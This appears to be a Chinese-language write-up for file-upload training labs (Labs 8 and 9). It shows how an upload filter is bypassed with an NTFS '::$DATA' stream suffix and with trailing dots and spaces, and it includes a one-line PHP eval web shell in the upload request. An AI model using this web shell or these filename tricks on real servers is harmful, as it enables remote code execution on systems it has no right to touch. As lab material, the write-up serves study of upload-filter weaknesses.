凡艰辛的路,当由勇敢者以坚硬的脚底踏开。
黑盒测试
Lab 8
- 尝试之前的大小写发现没法绕过
- 尝试上传htaccess禁止上传
- 尝试后缀修改空格加点没法上传
- 尝试pphphp上传后,没法执行的
代码层可能绕不过去了,试一试系统层的,后缀空格加点号没办法上传,试一试把文件名改成.php::$DATA
Content-Disposition: form-data; name="upload_file"; filename="m.php::$DATA"
Content-Type: application/octet-stream
<?php @eval($_GET['x']);?>
然后就上传成功了….原理是win的文件命名规则绕过….
Lab 9
试了之前的套路都没能上传,继续利用win下的文件流特性绕过,上传
m.php. . . . . . . .
上传成功….
白盒测试
Lab 8
与前面的文章一样,只是没有过滤::$DATA
Lab 9
虽然代码中将后缀的部分做了处理,但是明显处理不全面,只是删除了最后的空格和点号,这个时候多加几个空格和点号就可以上传了…
